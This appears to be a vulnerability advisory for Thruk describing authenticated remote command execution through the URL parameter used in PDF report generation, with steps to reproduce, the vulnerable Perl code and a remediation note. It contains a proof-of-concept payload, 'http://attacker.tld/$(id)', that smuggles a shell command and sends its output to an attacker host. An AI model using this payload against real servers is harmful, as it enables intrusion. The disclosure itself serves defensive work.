Summary

Authenticated RCE in Thruk allows authorized users with network access to inject arbitrary commands via the URL parameter during PDF report generation.

Details

The Thruk web application does not properly process the url parameter when generating a PDF report. An authorized attacker with access to the reporting functionality could inject arbitrary commands that would be executed when the script /script/html2pdf.sh is called.
The vulnerability can be exploited by an authorized user with network access.

PoC

Steps to reproduce

Log in to the Thruk app
Open "Reports" > "Reporting" > "Create New Report"
Customize settings

Report Type - Report From Url
Direct PDF - Yes
Report from Url - http://attacker.tld/$(id)

Click "Regenerate Report" button

As a result, during the report generation process, the result of executing the id command will be sent to the attacker's website.

Vulnerable code fragment
https://github.com/sni/Thruk/blob/4d01d50c8a25dddeeb60039271e11b5aa9b8dac3/plugins/plugins-available/reports2/lib/Thruk/Utils/Reports/Render.pm#L385-L396

    my $url            = $c->stash->{'param'}->{'url'};
    [...]
    if($url =~ m/^https?:\/\/([^\/]+)/mx && $c->stash->{'param'}->{'pdf'} && $c->stash->{'param'}->{'pdf'} eq 'yes') {
        [...]
        my $cmd = $c->config->{home}.'/script/html2pdf.sh "'.$url.'" "'.$c->stash->{'attachment'}.'.pdf"';
        [...]
        Thruk::Utils::IO::cmd($cmd);

Remediation

In this specific case, it would suffice to escape a string so that it can be used as a shell argument. When using the escape function, it is important to take precautions to avoid the possibility of shell commands being injected.

Acknowledgements

The vulnerability was discovered by Sergey Bobrov (Kaspersky, https://kaspersky.com/)
https://github.com/BlackFan

Impact

Remote Code Execution